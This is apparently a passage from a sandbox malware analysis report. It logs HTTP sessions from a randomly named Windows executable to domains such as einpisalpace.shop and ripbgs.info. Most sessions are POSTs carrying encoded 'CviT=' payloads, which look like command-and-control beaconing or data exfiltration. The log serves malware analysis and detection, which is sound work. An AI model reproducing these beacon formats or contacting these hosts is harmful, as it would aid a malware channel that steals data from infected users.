                                                    Data Raw: 43 76 69 54 3d 39 4d 68 4e 67 45 52 67 66 48 52 43 48 72 35 76 4f 5a 36 36 63 70 41 75 70 66 58 63 55 38 45 33 31 54 5a 4d 2b 4b 45 59 32 39 76 2f 64 32 39 70 48 75 32 77 64 5a 5a 2b 30 61 4b 34 72 70 49 2f 50 67 4b 58 6a 74 4d 79 42 75 56 79 77 50 30 46 6b 68 32 66 46 4c 6a 4d 76 79 54 35 77 73 38 74 43 5a 38 6a 37 55 61 46 50 51 30 56 4a 6b 4e 63 52 49 49 70 30 56 36 4d 59 57 4c 2b 4e 4e 6d 45 36 41 66 75 2b 6d 4e 2b 6f 46 4e 55 6d 4a 6e 4d 5a 30 73 72 6f 64 41 38 52 78 4d 65 66 6b 45 37 74 6a 69 5a 35 6f 57 64 4b 6f 49 4f 6e 76 35 55 42 34 7a 49 74 42 71 72 6f 31 6f 33 75 53 57 2f 53 42 4a 65 74 6a 77 47 30 53 38 78 56 6f 44 4b 33 66 79 57 39 4f 6b 57 57 77 54 62 4c 6f 70 71 56 67 34 72 4b 61 77 78 39 4b 6f 59 36 68 49 6d 77 42 78 45 68 70 4c 43 75 4e 63 51 44 30 57 70 38 6a 4e 52 64 79 63 4b 41 54 77 47 68 2f 45 53 66 4c 57 72 34 4e 57 45 41 46 4a 68 49 6a 63 44 34 72 79 34 76 79 4f 68 33 4d 52 6c 43 79 32 7a 59 6a 37 79 6d 58 4d 4d 46 39 42 52 51 7a 6b 6e 66 6e 45 55 4c 78 42 38 42 5a 67 5a 67 [TRUNCATED]
                                                    Data Ascii: CviT=[TRUNCATED]
                                                    Jan 13, 2025 09:34:44.760562897 CET | 193 | IN | HTTP/1.1 302 Found
                                                    Date: Mon, 13 Jan 2025 08:34:44 GMT
                                                    Content-Length: 0
                                                    Connection: close
                                                    Location: https://laduta.xyz/d89m
                                                    X-Served-By: Namecheap URL Forward
                                                    Server: namecheap-nginx


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    4 | 192.168.2.6 | 49991 | 192.64.119.109 | 80 | 6688 | C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jan 13, 2025 09:34:46.830308914 CET | 513 | OUT | GET /d89m/?CviT=wOJtjxBUJG0NHp56IJ7sd/1V3u72daYOpRR77J0hq9zwdUZOJreNUKl+oLjHq+QISX71stRTOJ1jv48F/TSYOOjikWrIxOApFu5A5DiOQ2wTGmACeJ5Y8X2xSxX+WaLEulDl8ws=&YFCLW=BxgTctSh HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.laduta.xyz
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                    Jan 13, 2025 09:34:47.303967953 CET | 607 | IN | HTTP/1.1 302 Found
                                                    Date: Mon, 13 Jan 2025 08:34:47 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Length: 209
                                                    Connection: close
                                                    Location: https://laduta.xyz/d89m?CviT=wOJtjxBUJG0NHp56IJ7sd%2F1V3u72daYOpRR77J0hq9zwdUZOJreNUKl+oLjHq+QISX71stRTOJ1jv48F%2FTSYOOjikWrIxOApFu5A5DiOQ2wTGmACeJ5Y8X2xSxX+WaLEulDl8ws%3D&YFCLW=BxgTctSh
                                                    X-Served-By: Namecheap URL Forward
                                                    Server: namecheap-nginx
                                                    Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 6c 61 64 75 74 61 2e 78 79 7a 2f 64 38 39 6d 3f 43 76 69 54 3d 77 4f 4a 74 6a 78 42 55 4a 47 30 4e 48 70 35 36 49 4a 37 73 64 25 32 46 31 56 33 75 37 32 64 61 59 4f 70 52 52 37 37 4a 30 68 71 39 7a 77 64 55 5a 4f 4a 72 65 4e 55 4b 6c 2b 6f 4c 6a 48 71 2b 51 49 53 58 37 31 73 74 52 54 4f 4a 31 6a 76 34 38 46 25 32 46 54 53 59 4f 4f 6a 69 6b 57 72 49 78 4f 41 70 46 75 35 41 35 44 69 4f 51 32 77 54 47 6d 41 43 65 4a 35 59 38 58 32 78 53 78 58 2b 57 61 4c 45 75 6c 44 6c 38 77 73 25 33 44 26 59 46 43 4c 57 3d 42 78 67 54 63 74 53 68 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                                                    Data Ascii: <a href='https://laduta.xyz/d89m?CviT=wOJtjxBUJG0NHp56IJ7sd%2F1V3u72daYOpRR77J0hq9zwdUZOJreNUKl+oLjHq+QISX71stRTOJ1jv48F%2FTSYOOjikWrIxOApFu5A5DiOQ2wTGmACeJ5Y8X2xSxX+WaLEulDl8ws%3D&YFCLW=BxgTctSh'>Found</a>.


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    5 | 192.168.2.6 | 49992 | 188.114.96.3 | 80 | 6688 | C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jan 13, 2025 09:34:52.357657909 CET | 787 | OUT | POST /pgw3/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.einpisalpace.shop
                                                    Origin: http://www.einpisalpace.shop
                                                    Referer: http://www.einpisalpace.shop/pgw3/
                                                    Cache-Control: no-cache
                                                    Content-Length: 209
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                    Data Raw: 43 76 69 54 3d 74 67 39 44 36 52 52 68 71 39 4d 54 7a 47 30 6b 77 71 51 44 74 39 47 64 75 38 50 72 75 73 44 4c 51 41 62 6d 2f 73 49 50 4a 45 6e 58 54 33 31 4e 38 45 50 72 6b 2b 76 54 34 4a 4f 6d 48 77 66 48 63 49 58 76 38 6c 36 44 45 2f 38 67 6a 53 6e 4d 34 44 79 31 6a 6c 43 43 53 2f 6d 77 68 63 2f 70 4b 4c 53 48 6e 42 5a 56 51 44 77 57 74 38 34 75 57 4e 75 6e 70 2f 2b 4d 73 71 49 74 30 37 74 77 44 5a 6f 48 74 6e 4b 58 63 54 71 66 6f 65 35 7a 30 39 43 36 65 47 53 58 6e 44 2b 55 6d 35 6e 68 2b 78 76 31 61 53 6e 6a 57 34 76 65 36 43 61 70 79 58 36 34 45 43 6d 59 44 71 61 4c 6a 69 50 72 6d 41 32 6e 62 48 75 64 38 37 78 36
                                                    Data Ascii: CviT=tg9D6RRhq9MTzG0kwqQDt9Gdu8PrusDLQAbm/sIPJEnXT31N8EPrk+vT4JOmHwfHcIXv8l6DE/8gjSnM4Dy1jlCCS/mwhc/pKLSHnBZVQDwWt84uWNunp/+MsqIt07twDZoHtnKXcTqfoe5z09C6eGSXnD+Um5nh+xv1aSnjW4ve6CapyX64ECmYDqaLjiPrmA2nbHud87x6
                                                    Jan 13, 2025 09:34:53.467041969 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 13 Jan 2025 08:34:53 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    Last-Modified: Sun, 05 Jan 2025 21:39:02 GMT
                                                    cf-cache-status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KmpM3e1wafTDo8ga%2BUvIiVhequ6JWzaXHwyFkY3Wtg%2Baqy3WG8c5k9kX%2BlCkstptVF8%2FMjmTyhZNDZrripHRhR%2BolcTYrFXfZ1Bh89us%2FW5piyDAF3Fq5TRk8LdtXiZxl7lO8xmkg3Q%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 90140cb7bf2b1899-EWR
                                                    Content-Encoding: gzip
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1559&min_rtt=1559&rtt_var=779&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=787&delivery_rate=0&cwnd=151&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                    Data Raw: 32 64 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 4d 6f db 38 10 bd e7 57 cc 2a d8 45 17 a8 4c cb 4e 9b 58 92 05 64 ed 04 5b a0 db 06 ad 8b dd 1c 19 69 2c 32 95 48 2e 39 96 ad 06 fd ef 05 25 c5 76 d0 0f f4 50 ea 42 cd bc 79 6f 86 9c 61 fa db f2 ed 62 75 7b 73 05 82 ea 0a 6e 3e fc f5 fa d5 02 82 90 b1 7f a7 0b c6 96 ab 25 fc f7 f7 ea 9f d7 10 8d c6 f0 9e ac cc 89 b1 ab 37 01 04 82 c8 c4 8c 6d b7 db d1 76 3a d2 b6 64 ab 77 6c e7 59 22 1f 36 6c 43 d7 c5 8c 0a 2a 82 ec 24 ed 44 76 75 a5 dc fc 1b 04 d1 6c 36 eb e3 02 0f 8a 2b ae ca 79 80 2a 80 fd 2e 4b 05 f2 22 3b 01 00 48 49 52 85 d9 d9 f8 0c fe a8 0b ee 44 02 6f 34 c1 b5 de a8 22 65 bd b3 07 d6 48 1c bc 5e 88 ff 6f 64 33 0f 16 5a 11 2a 0a 57 ad c1 00 f2 fe 6f 1e 10 ee 88 79 fd 04 72 c1 ad 43 9a 7f 58 5d 87 17 01 3b 26 52 bc c6 79 50 a0 cb ad 34 24 b5 3a 62 78 af ad 6d 9f 83 e1 25 82 d2 04 6b 9f cc 3e dc 51 5b 21 50 6b 70 d0 ca 9d 0b 7a 9f 5f 77 ba 68 e1 61 ad 15 85 4e 7e c2 38 3a 33 bb 04 72 5d 69 1b 9f 9e 77 2b 81 ce bd e6 b5 ac da 98 5b c9 ab 04 3c [TRUNCATED]
                                                    Data Ascii: 2daTMo8W*ELNXd[i,2H.9%vPByoabu{sn>%7mv:dwlY"6lC*$Dvul6+y*.K";HIRDo4"eH^od3Z*WoyrCX];&RyP4$:bxm%k>Q[!Pkpz_whaN~8:3r]iw+[<U+Y8GEh{N=aQf
                                                    Jan 13, 2025 09:34:53.467108011 CET | 381 | IN | Data Raw: e7 97 d7 09 d4 dc 96 52 c5 70 3e 36 3b 18 fb ef 98 60 02 0f 3d 1e 4e 97 57 2f 17 2f 96 4f 73 80 21 89 83 08 4c 3a 91 ce b0 45 59 0a 8a e1 4e 57 45 02 15 12 a1 0d 9d e1 b9 54 65 0c 61 e4 81 8f f2 e1 b4 93 9f ce cc ee 48 df c0 c3 56 16 24 e2 69 4f
                                                    Data Ascii: Rp>6;`=NW//Os!L:EYNWETeaHV$iOuAXb!iwGiyP(dK4<x8'F:IXs"t;uw&K9$TF:^mX}eKRfK +dsWv@~fZ-ZT%<


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    6 | 192.168.2.6 | 49993 | 188.114.96.3 | 80 | 6688 | C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jan 13, 2025 09:34:54.899080038 CET | 811 | OUT | POST /pgw3/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.einpisalpace.shop
                                                    Origin: http://www.einpisalpace.shop
                                                    Referer: http://www.einpisalpace.shop/pgw3/
                                                    Cache-Control: no-cache
                                                    Content-Length: 233
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                    Data Raw: 43 76 69 54 3d 74 67 39 44 36 52 52 68 71 39 4d 54 79 6c 73 6b 79 4d 59 44 72 64 47 63 79 4d 50 72 6e 4d 44 50 51 41 48 6d 2f 70 77 68 49 32 44 58 54 53 5a 4e 39 46 50 72 6c 2b 76 54 7a 70 4f 76 4a 51 66 49 63 49 72 52 38 6c 47 44 45 37 55 67 6a 53 58 4d 34 30 75 32 69 31 43 41 65 66 6d 79 38 73 2f 70 4b 4c 53 48 6e 42 4d 34 51 44 59 57 73 4e 49 75 4d 73 75 6f 6a 66 2b 4c 6d 4b 49 74 2f 62 74 30 44 5a 6f 66 74 6c 76 4b 63 52 69 66 6f 63 68 7a 30 6f 32 35 55 47 53 52 6f 6a 2f 51 6e 6f 61 49 6d 69 7a 33 52 6b 6e 54 4c 49 72 2f 37 30 48 7a 75 6b 36 62 57 53 47 61 44 6f 43 35 6a 43 50 42 6b 41 4f 6e 4a 51 69 36 7a 50 55 5a 33 65 4f 56 6c 50 5a 53 47 42 42 38 4e 72 50 6c 6b 59 73 51 58 51 3d 3d
                                                    Data Ascii: CviT=tg9D6RRhq9MTylskyMYDrdGcyMPrnMDPQAHm/pwhI2DXTSZN9FPrl+vTzpOvJQfIcIrR8lGDE7UgjSXM40u2i1CAefmy8s/pKLSHnBM4QDYWsNIuMsuojf+LmKIt/bt0DZoftlvKcRifochz0o25UGSRoj/QnoaImiz3RknTLIr/70Hzuk6bWSGaDoC5jCPBkAOnJQi6zPUZ3eOVlPZSGBB8NrPlkYsQXQ==
                                                    Jan 13, 2025 09:34:55.999488115 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 13 Jan 2025 08:34:55 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    Last-Modified: Sun, 05 Jan 2025 21:39:02 GMT
                                                    cf-cache-status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uEg6bJs24FeUKbn5b7tRjZ7zFMqVEmQN90RQuuBz2mcvn9pYi0iOORnh7jhDvJCS4TU4bT36Awk7kHDeo5S6OU%2BBOVfvJ8xcZeoVzz93Tnhj3D7ypZmxzplCgffOZRpzqTPDo3o8sy4%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 90140cc79d5b41f3-EWR
                                                    Content-Encoding: gzip
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1687&min_rtt=1687&rtt_var=843&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=811&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                    Data Raw: 32 64 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 4d 6f db 38 10 bd e7 57 cc 2a d8 45 17 a8 4c cb 4e 9b 58 92 05 64 ed 04 5b a0 db 06 ad 8b dd 1c 19 69 2c 32 95 48 2e 39 96 ad 06 fd ef 05 25 c5 76 d0 0f f4 50 ea 42 cd bc 79 6f 86 9c 61 fa db f2 ed 62 75 7b 73 05 82 ea 0a 6e 3e fc f5 fa d5 02 82 90 b1 7f a7 0b c6 96 ab 25 fc f7 f7 ea 9f d7 10 8d c6 f0 9e ac cc 89 b1 ab 37 01 04 82 c8 c4 8c 6d b7 db d1 76 3a d2 b6 64 ab 77 6c e7 59 22 1f 36 6c 43 d7 c5 8c 0a 2a 82 ec 24 ed 44 76 75 a5 dc fc 1b 04 d1 6c 36 eb e3 02 0f 8a 2b ae ca 79 80 2a 80 fd 2e 4b 05 f2 22 3b 01 00 48 49 52 85 d9 d9 f8 0c fe a8 0b ee 44 02 6f 34 c1 b5 de a8 22 65 bd b3 07 d6 48 1c bc 5e 88 ff 6f 64 33 0f 16 5a 11 2a 0a 57 ad c1 00 f2 fe 6f 1e 10 ee 88 79 fd 04 72 c1 ad 43 9a 7f 58 5d 87 17 01 3b 26 52 bc c6 79 50 a0 cb ad 34 24 b5 3a 62 78 af ad 6d 9f 83 e1 25 82 d2 04 6b 9f cc 3e dc 51 5b 21 50 6b 70 d0 ca 9d 0b 7a 9f 5f 77 ba 68 e1 61 ad 15 85 4e 7e c2 38 3a 33 bb 04 72 5d 69 1b 9f 9e 77 2b 81 ce bd e6 b5 ac da 98 5b c9 ab 04 3c [TRUNCATED]
                                                    Data Ascii: 2daTMo8W*ELNXd[i,2H.9%vPByoabu{sn>%7mv:dwlY"6lC*$Dvul6+y*.K";HIRDo4"eH^od3Z*WoyrCX];&RyP4$:bxm%k>Q[!Pkpz_whaN~8:3r]iw+[<U+Y8GEh{N=aQfRp
                                                    Jan 13, 2025 09:34:55.999533892 CET | 371 | IN | Data Raw: 3e 36 3b 18 fb ef 98 60 02 0f 3d 1e 4e 97 57 2f 17 2f 96 4f 73 80 21 89 83 08 4c 3a 91 ce b0 45 59 0a 8a e1 4e 57 45 02 15 12 a1 0d 9d e1 b9 54 65 0c 61 e4 81 8f f2 e1 b4 93 9f ce cc ee 48 df c0 c3 56 16 24 e2 69 4f fb 75 b1 03 41 58 e1 9a 62 be
                                                    Data Ascii: >6;`=NW//Os!L:EYNWETeaHV$iOuAXb!iwGiyP(dK4<x8'F:IXs"t;uw&K9$TF:^mX}eKRfK +dsWv@~fZ-ZT%<PhtDN:


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    7 | 192.168.2.6 | 49994 | 188.114.96.3 | 80 | 6688 | C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jan 13, 2025 09:34:58.471421957 CET | 1824 | OUT | POST /pgw3/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.einpisalpace.shop
                                                    Origin: http://www.einpisalpace.shop
                                                    Referer: http://www.einpisalpace.shop/pgw3/
                                                    Cache-Control: no-cache
                                                    Content-Length: 1245
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                    Data Raw: 43 76 69 54 3d 74 67 39 44 36 52 52 68 71 39 4d 54 79 6c 73 6b 79 4d 59 44 72 64 47 63 79 4d 50 72 6e 4d 44 50 51 41 48 6d 2f 70 77 68 49 32 4c 58 53 6b 4e 4e 38 6d 58 72 2f 2b 76 54 77 70 4f 69 4a 51 66 56 63 49 43 57 38 6c 4b 31 45 39 51 67 69 7a 33 4d 36 47 47 32 73 31 43 41 57 2f 6d 7a 68 63 2f 34 4b 4c 69 44 6e 42 63 34 51 44 59 57 73 4f 51 75 61 74 75 6f 6c 66 2b 4d 73 71 49 62 30 37 74 51 44 5a 77 50 74 6c 37 61 41 31 75 66 72 38 78 7a 35 2b 71 35 4a 57 53 54 72 6a 2f 32 6e 6f 57 54 6d 69 75 49 52 6b 36 62 4c 50 6a 2f 33 46 66 75 79 48 57 6a 4c 68 6d 6f 56 72 32 4c 74 44 76 6b 38 42 6d 4a 4d 79 6e 49 2b 38 63 47 35 34 6d 59 67 76 59 77 4d 33 31 58 49 4f 32 73 74 73 39 69 4c 53 53 4a 49 49 6e 50 6c 67 37 74 37 6a 4a 39 4b 61 68 70 48 51 62 69 6a 41 70 2f 67 73 6c 4f 50 53 62 6c 42 75 31 70 62 2b 30 42 6b 49 6d 79 30 4c 79 5a 55 39 44 41 49 53 36 77 50 64 70 34 53 68 30 79 63 61 4b 50 52 72 37 71 45 50 35 53 58 75 4c 39 68 47 51 38 55 7a 36 4b 44 31 42 74 4b 70 36 69 61 77 59 46 76 41 75 36 73 [TRUNCATED]
                                                    Data Ascii: CviT=[TRUNCATED]
                                                    Jan 13, 2025 09:34:59.627232075 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 13 Jan 2025 08:34:59 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    Last-Modified: Sun, 05 Jan 2025 21:39:02 GMT
                                                    cf-cache-status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r3M1oF1vOrNdQRcOIOkTYK8qG2pt%2Bv5ePrYws651IVelprKnVaXWqEw6TQPWWYFFWnfHnt97r6FyfPi8%2BfWvgDg5Bho8WL3gGGzoVdHsd05XUjk1Tc4wBO7SJrgTDNAc9lTUbC4XKZQ%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 90140cddecff8ce0-EWR
                                                    Content-Encoding: gzip
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1992&min_rtt=1992&rtt_var=996&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1824&delivery_rate=0&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                    Timestamp: Jan 13, 2025 09:34:59.627259970 CET | Bytes transferred: 379 | Direction: IN | Data: continuation of the gzip-compressed response body (hex and ASCII dumps omitted)


                                                    Session ID: 8 | Source IP: 192.168.2.6 | Source Port: 49996 | Destination IP: 188.114.96.3 | Destination Port: 80 | PID: 6688 | Process: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe
                                                    Timestamp: Jan 13, 2025 09:35:01.020791054 CET | Bytes transferred: 520 | Direction: OUT | Data: GET /pgw3/?YFCLW=BxgTctSh&CviT=giVj5h0GrIkb2nAntMgQgIHhz9vsvZP6QDamwOszT0WhTX9+0mDl7NHSkZ+hOyPxCf2Vu3CaIskW8RrY03yQo2eiaMWSi+vSOZimmmNTE2YBudIqT+28rai5l9Ujnr5BEbYzzwU= HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.einpisalpace.shop
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                    Timestamp: Jan 13, 2025 09:35:02.157812119 CET | Bytes transferred: 1236 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                                    Date: Mon, 13 Jan 2025 08:35:02 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    Last-Modified: Sun, 05 Jan 2025 21:39:02 GMT
                                                    cf-cache-status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Snvxd1puUF9o2Mz0OAQuGkTECCtcN46uuYGC4cbROHn8UIIb6iVPMLI8jOph7xzpmEa%2F2JuptClsjS1dEl%2BbjFmDTnRsKUZMy%2FP5VL7y7t8Y2w6nRn1idTfAUdK6Y613lb8sYwznWBI%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 90140cedebf9421f-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1705&min_rtt=1705&rtt_var=852&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=520&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                    Data Ascii: 591<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>404 &mdash; Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="Sorry, page not found"/> <style type="text/css
                                                    Timestamp: Jan 13, 2025 09:35:02.157833099 CET | Bytes transferred: 1052 | Direction: IN | Data: continuation of the 404 page (hex dump omitted; ASCII rendering follows)
                                                    Data Ascii: "> body {font-size:14px; color:#777777; font-family:arial; text-align:center;} h1 {font-size:180px; color:#99A7AF; margin: 70px 0 0 0;} h2 {color: #DE6C5D; font-family: arial; font-size: 20px; font-weight: bold; letter-


                                                    Session ID: 9 | Source IP: 192.168.2.6 | Source Port: 49997 | Destination IP: 47.83.1.90 | Destination Port: 80 | PID: 6688 | Process: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe
                                                    Timestamp: Jan 13, 2025 09:35:07.382155895 CET | Bytes transferred: 769 | Direction: OUT | Data: POST /hf4a/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.ripbgs.info
                                                    Origin: http://www.ripbgs.info
                                                    Referer: http://www.ripbgs.info/hf4a/
                                                    Cache-Control: no-cache
                                                    Content-Length: 209
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                    Data Ascii: CviT=4zjSVCBXNBiBMUK6kIUrnrDt1rIgFXgTkmBvhTP3Wl/4YLF14dxyFYHnxHDGpWAtDaDt6ENcjGJFfcE9ZEFupZxlUo/A68lIptMS4mItHq4FcT83YnrxqgJrgldIH1yYp5Jsx3YFmV3zAu6IvvegRGV5ZKXLtfaWxFdAGrx/iDojG4RI/nKu1IQMBqN7NE+k+Y11MFPnkCbe


                                                    Session ID: 10 | Source IP: 192.168.2.6 | Source Port: 49998 | Destination IP: 47.83.1.90 | Destination Port: 80 | PID: 6688 | Process: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe
                                                    Timestamp: Jan 13, 2025 09:35:09.932131052 CET | Bytes transferred: 793 | Direction: OUT | Data: POST /hf4a/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.ripbgs.info
                                                    Origin: http://www.ripbgs.info
                                                    Referer: http://www.ripbgs.info/hf4a/
                                                    Cache-Control: no-cache
                                                    Content-Length: 233
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                    Data Ascii: CviT=4zjSVCBXNBiBN0a6mr8rhLDusLIgL3hakmNvhX3BVXb4Yq115cxyEYHnpXDDn2AiDb+Y6BNcjHtFfYI9Z3tvoJxnYI/CnslIptMS4mcDHqQFcjM3Xmr22wJ0hldIR1ycp5Jaxz5SmXPzAr+Iu9mjbGV/EaW4lPbT+GosZbBozig8KuMSjUKNnYwOBoVJNk+O8YN1eSDAr2+9Xp6rqFk7fqSPzKME8HOOSA==


                                                    Session ID: 11 | Source IP: 192.168.2.6 | Source Port: 49999 | Destination IP: 47.83.1.90 | Destination Port: 80 | PID: 6688 | Process: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe
                                                    Timestamp: Jan 13, 2025 09:35:12.475527048 CET | Bytes transferred: 1806 | Direction: OUT | Data: POST /hf4a/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.ripbgs.info
                                                    Origin: http://www.ripbgs.info
                                                    Referer: http://www.ripbgs.info/hf4a/
                                                    Cache-Control: no-cache
                                                    Content-Length: 1245
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
